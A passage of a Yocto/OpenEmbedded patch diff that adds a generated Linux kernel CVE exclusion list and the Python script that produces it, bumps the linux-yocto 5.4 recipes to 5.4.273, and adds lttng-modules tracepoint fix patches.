+CVE_CHECK_WHITELIST += "CVE-2024-26662"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26663"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26664"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26665"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26666"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26667"
+
+# CVE-2024-26668 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26669 needs backporting (fixed from 6.8rc2)
+
+# fixed-version: only affects 6.6rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26670"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26671"
+
+# CVE-2024-26672 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26673"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26674"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26675"
+
+# CVE-2024-26676 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26677 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26678"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26679"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26680"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26681"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26682"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26683"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26684"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26685"
+
+# CVE-2024-26686 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26687 needs backporting (fixed from 6.8rc5)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26688"
+
+# CVE-2024-26689 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26690"
+
+# CVE-2024-26691 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26692"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26693"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26694"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26695"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26696"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26697"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26698"
+
+# CVE-2024-26699 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26700 needs backporting (fixed from 6.8rc4)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26702"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26703"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26704"
+
+# fixed-version: only affects 6.6rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26705"
+
+# CVE-2024-26706 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26707"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26708"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26709"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26710"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26711"
+
+# CVE-2024-26712 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26713 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26714"
+
+# CVE-2024-26715 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26716"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26717"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26718"
+
+# CVE-2024-26719 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26720"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26721"
+
+# fixed-version: only affects 6.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26722"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26723"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26724"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26725"
+
+# CVE-2024-26726 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26727"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26728"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26729"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26730"
+
+# fixed-version: only affects 6.4rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26731"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26732"
+
+# CVE-2024-26733 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26734"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26735"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26736"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26737"
+
+# CVE-2024-26738 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26739 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26740 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26741"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26742"
+
+# CVE-2024-26743 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26744 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26745 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26746"
+
+# CVE-2024-26747 needs backporting (fixed from 6.8rc6)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26748"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26749"
+
+# fixed-version: only affects 6.8rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26750"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26751"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26752"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26753"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26754"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26755"
+
+# CVE-2024-26756 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26757 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26758 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26759 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26760"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26761"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26762"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26763"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26764"
+
+# CVE-2024-26765 needs backporting (fixed from 6.8rc6)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26766"
+
+# CVE-2024-26767 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26768 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26769 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26770 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26771 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26772"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26773"
+
+# CVE-2024-26774 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26775 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26776 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26777"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26778"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26779"
+
+# fixed-version: only affects 6.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26780"
+
+# fixed-version: only affects 6.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26781"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26782"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26783"
+
+# CVE-2024-26784 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26785"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26786"
+
+# CVE-2024-26787 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26788"
+
+# CVE-2024-26789 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26790"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26791"
+
+# fixed-version: only affects 6.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26792"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26793"
+
+# fixed-version: only affects 6.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26794"
+
+# CVE-2024-26795 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26796"
+
+# CVE-2024-26797 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26798 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26799"
+
+# fixed-version: only affects 6.8rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26800"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26801"
+
+# CVE-2024-26802 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26803 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26804"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26805"
+
+# CVE-2024-26806 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26807"
+
+# CVE-2024-26808 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26809 needs backporting (fixed from 6.9rc1)
+
diff --git a/meta/recipes-kernel/linux/generate-cve-exclusions.py b/meta/recipes-kernel/linux/generate-cve-exclusions.py
new file mode 100755
index 0000000000..12ae3b0b1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/generate-cve-exclusions.py
@@ -0,0 +1,101 @@
+#! /usr/bin/env python3
+
+# Generate granular CVE status metadata for a specific version of the kernel
+# using data from linuxkernelcves.com.
+#
+# SPDX-License-Identifier: GPL-2.0-only
+
+import argparse
+import datetime
+import json
+import pathlib
+import re
+
+from packaging.version import Version
+
+
+def parse_version(s):
+ """
+ Parse the version string and either return a packaging.version.Version, or
+ None if the string was unset or "unk".
+ """
+ if s and s != "unk":
+ # packaging.version.Version doesn't approve of versions like v5.12-rc1-dontuse
+ s = s.replace("-dontuse", "")
+ return Version(s)
+ return None
+
+
+def main(argp=None):
+ parser = argparse.ArgumentParser()
+ parser.add_argument("datadir", type=pathlib.Path, help="Path to a clone of https://github.com/nluedtke/linux_kernel_cves")
+ parser.add_argument("version", type=Version, help="Kernel version number to generate data for, such as 6.1.38")
+
+ args = parser.parse_args(argp)
+ datadir = args.datadir
+ version = args.version
+ base_version = f"{version.major}.{version.minor}"
+
+ with open(datadir / "data" / "kernel_cves.json", "r") as f:
+ cve_data = json.load(f)
+
+ with open(datadir / "data" / "stream_fixes.json", "r") as f:
+ stream_data = json.load(f)
+
+ print(f"""
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at {datetime.datetime.now()} for version {version}
+
+python check_kernel_cve_status_version() {{
+ this_version = "{version}"
+ kernel_version = d.getVar("LINUX_VERSION")
+ if kernel_version != this_version:
+ bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+""")
+
+ for cve, data in cve_data.items():
+ if "affected_versions" not in data:
+ print(f"# Skipping {cve}, no affected_versions")
+ print()
+ continue
+
+ affected = data["affected_versions"]
+ first_affected, last_affected = re.search(r"(.+) to (.+)", affected).groups()
+ first_affected = parse_version(first_affected)
+ last_affected = parse_version(last_affected)
+
+ handled = False
+ if not last_affected:
+ print(f"# {cve} has no known resolution")
+ elif first_affected and version < first_affected:
+ print(f"# fixed-version: only affects {first_affected} onwards")
+ handled = True
+ elif last_affected < version:
+ print(f"# fixed-version: Fixed after version {last_affected}")
+ handled = True
+ else:
+ if cve in stream_data:
+ backport_data = stream_data[cve]
+ if base_version in backport_data:
+ backport_ver = Version(backport_data[base_version]["fixed_version"])
+ if backport_ver <= version:
+ print(f"# cpe-stable-backport: Backported in {backport_ver}")
+ handled = True
+ else:
+ # TODO print a note that the kernel needs bumping
+ print(f"# {cve} needs backporting (fixed from {backport_ver})")
+ else:
+ print(f"# {cve} needs backporting (fixed from {last_affected})")
+ else:
+ print(f"# {cve} needs backporting (fixed from {last_affected})")
+
+ if handled:
+ print(f'CVE_CHECK_WHITELIST += "{cve}"')
+
+ print()
+
+
+if __name__ == "__main__":
+ main()
diff --git a/meta/recipes-kernel/linux/kernel-devsrc.bb b/meta/recipes-kernel/linux/kernel-devsrc.bb
index 5940cc90ea..887e1e2430 100644
--- a/meta/recipes-kernel/linux/kernel-devsrc.bb
+++ b/meta/recipes-kernel/linux/kernel-devsrc.bb
@@ -86,6 +86,12 @@ do_install() {
# be dealt with.
# cp -a scripts $kerneldir/build
+ # although module.lds can be regenerated on target via 'make modules_prepare'
+ # there are several places where 'makes scripts prepare' is done, and that won't
+ # regenerate the file. So we copy it onto the target as a migration to using
+ # modules_prepare
+ cp -a --parents scripts/module.lds $kerneldir/build/ 2>/dev/null || :
+
if [ -d arch/${ARCH}/scripts ]; then
cp -a arch/${ARCH}/scripts $kerneldir/build/arch/${ARCH}
fi
@@ -171,7 +177,7 @@ do_install() {
cp -a --parents $SYSCALL_TOOLS $kerneldir/build/
fi
- cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/
+ cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/ 2>/dev/null || :
fi
if [ -d arch/${ARCH}/include ]; then
diff --git a/meta/recipes-kernel/linux/linux-dummy.bb b/meta/recipes-kernel/linux/linux-dummy.bb
index 62cf6f5ea6..c56f8990de 100644
--- a/meta/recipes-kernel/linux/linux-dummy.bb
+++ b/meta/recipes-kernel/linux/linux-dummy.bb
@@ -5,10 +5,12 @@ where you wish to build the kernel externally from the build system."
SECTION = "kernel"
LICENSE = "GPLv2"
-LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
+LIC_FILES_CHKSUM = "file://COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
PROVIDES += "virtual/kernel"
+inherit deploy linux-dummy
+
PACKAGES_DYNAMIC += "^kernel-module-.*"
PACKAGES_DYNAMIC += "^kernel-image-.*"
PACKAGES_DYNAMIC += "^kernel-firmware-.*"
@@ -24,7 +26,7 @@ DESCRIPTION_kernel-vmlinux = "Kernel vmlinux meta package"
INHIBIT_DEFAULT_DEPS = "1"
-#COMPATIBLE_MACHINE = "your_machine"
+COMPATIBLE_HOST = ".*-linux"
PR = "r1"
diff --git a/meta/recipes-kernel/linux/linux-yocto-dev.bb b/meta/recipes-kernel/linux/linux-yocto-dev.bb
index 06a9108fab..a1c0de9981 100644
--- a/meta/recipes-kernel/linux/linux-yocto-dev.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-dev.bb
@@ -10,8 +10,6 @@
inherit kernel
require recipes-kernel/linux/linux-yocto.inc
-# for ncurses tests
-inherit pkgconfig
# provide this .inc to set specific revisions
include recipes-kernel/linux/linux-yocto-dev-revisions.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
index 524e91ebfc..f912304858 100644
--- a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
@@ -11,13 +11,13 @@ python () {
raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
}
-SRCREV_machine ?= "3a5f7e9a874f0a6e9ad599b4fc6c491db231dd6f"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine ?= "c93e75bc334ba00df2d66411a0d79c4378cf4af8"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
diff --git a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
index 00e1b65782..2f94782471 100644
--- a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
@@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig"
require recipes-kernel/linux/linux-yocto.inc
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native"
KMETA = "kernel-meta"
KCONF_BSP_AUDIT_LEVEL = "2"
-SRCREV_machine_qemuarm ?= "58f39df46d9daf12a095ffe225032ec325612960"
-SRCREV_machine ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine_qemuarm ?= "d29f3f3a932319053ad24d84b087b0a57908c1bc"
+SRCREV_machine ?= "b6480d09d84d09e7560daa5c1d73917292ae30c0"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
PV = "${LINUX_VERSION}+git${SRCPV}"
diff --git a/meta/recipes-kernel/linux/linux-yocto.inc b/meta/recipes-kernel/linux/linux-yocto.inc
index 91df9c1cd5..2978c2fb90 100644
--- a/meta/recipes-kernel/linux/linux-yocto.inc
+++ b/meta/recipes-kernel/linux/linux-yocto.inc
@@ -1,6 +1,7 @@
SUMMARY = "Linux kernel"
SECTION = "kernel"
LICENSE = "GPLv2"
+HOMEPAGE = "https://www.yoctoproject.org/"
LIC_FILES_CHKSUM ?= "file://COPYING;md5=d7810fab7487fb0aad327b76f1be7cd7"
@@ -55,3 +56,6 @@ do_install_append(){
# enable kernel-sample for oeqa/runtime/cases's ksample.py test
KERNEL_FEATURES_append_qemuall=" features/kernel-sample/kernel-sample.scc"
+
+# CVE exclusion
+include recipes-kernel/linux/cve-exclusion.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
index 2a2ba24cd2..108043bd98 100644
--- a/meta/recipes-kernel/linux/linux-yocto_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
@@ -1,6 +1,7 @@
KBRANCH ?= "v5.4/standard/base"
require recipes-kernel/linux/linux-yocto.inc
+include recipes-kernel/linux/cve-exclusion_5.4.inc
# board specific branches
KBRANCH_qemuarm ?= "v5.4/standard/arm-versatile-926ejs"
@@ -12,16 +13,16 @@ KBRANCH_qemux86 ?= "v5.4/standard/base"
KBRANCH_qemux86-64 ?= "v5.4/standard/base"
KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64"
-SRCREV_machine_qemuarm ?= "561d4f6eb1de32e1448451db86656826cf406eb5"
-SRCREV_machine_qemuarm64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemumips ?= "e421f3f2399c153c4d58241cb6d1be926f7efc45"
-SRCREV_machine_qemuppc ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemuriscv64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemux86 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemux86-64 ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_machine_qemumips64 ?= "72d2f11b5f171e196d6b9824b82575d9a7b59e6f"
-SRCREV_machine ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine_qemuarm ?= "b7e0891bf4b281c4e29b86f708e10a3339670acc"
+SRCREV_machine_qemuarm64 ?= "ff75f0c7beb167391f0285dd2993394cd143a8a7"
+SRCREV_machine_qemumips ?= "650e43a19e625d1db9d8245cda27db7b86990398"
+SRCREV_machine_qemuppc ?= "0fb6546a09f90befecb11cd0f10274276e8a3021"
+SRCREV_machine_qemuriscv64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86-64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemumips64 ?= "f59947f338319b1741db5dfac34f08399561ab25"
+SRCREV_machine ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
# remap qemuarm to qemuarma15 for the 5.4 kernel
# KMACHINE_qemuarm ?= "qemuarma15"
@@ -30,7 +31,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
DEPENDS += "openssl-native util-linux-native"
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
new file mode 100644
index 0000000000..3fc7fd733d
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
@@ -0,0 +1,46 @@
+From 25b70c486bb96de0caf7cea1da42ed07801cca84 Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Mon, 4 Apr 2022 14:33:42 -0400
+Subject: [PATCH 17/19] fix: random: remove unused tracepoints (v5.18)
+
+See upstream commit :
+
+ commit 14c174633f349cb41ea90c2c0aaddac157012f74
+ Author: Jason A. Donenfeld <Jason@zx2c4.com>
+ Date: Thu Feb 10 16:40:44 2022 +0100
+
+ random: remove unused tracepoints
+
+ These explicit tracepoints aren't really used and show sign of aging.
+ It's work to keep these up to date, and before I attempted to keep them
+ up to date, they weren't up to date, which indicates that they're not
+ really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [369d82bb1746447514c877088d7c5fd0f39140f8]
+Change-Id: I3b8c3e2732e7efdd76ce63204ac53a48784d0df6
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 3ae2d39e..58da82b8 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -215,8 +215,11 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ CFLAGS_lttng-probe-printk.o += -Wframe-larger-than=2200
+ endif
+
++# Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) += $(shell \
+- if [ $(VERSION) -ge 4 \
++ if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++ -a \
++ $(VERSION) -ge 4 \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+--
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
new file mode 100644
index 0000000000..5c324a9bde
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
@@ -0,0 +1,45 @@
+From da956d1444139883f5d01078d945078738ffade4 Mon Sep 17 00:00:00 2001
+From: He Zhe <zhe.he@windriver.com>
+Date: Thu, 2 Jun 2022 06:36:08 +0000
+Subject: [PATCH 18/19] fix: random: remove unused tracepoints (v5.10, v5.15)
+
+The following kernel commit has been back ported to v5.10.119 and v5.15.44.
+
+commit 14c174633f349cb41ea90c2c0aaddac157012f74
+Author: Jason A. Donenfeld <Jason@zx2c4.com>
+Date: Thu Feb 10 16:40:44 2022 +0100
+
+ random: remove unused tracepoints
+
+ These explicit tracepoints aren't really used and show sign of aging.
+ It's work to keep these up to date, and before I attempted to keep them
+ up to date, they weren't up to date, which indicates that they're not
+ really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [1901e0eb58795e850e8fdcb5e1c235e4397b470d]
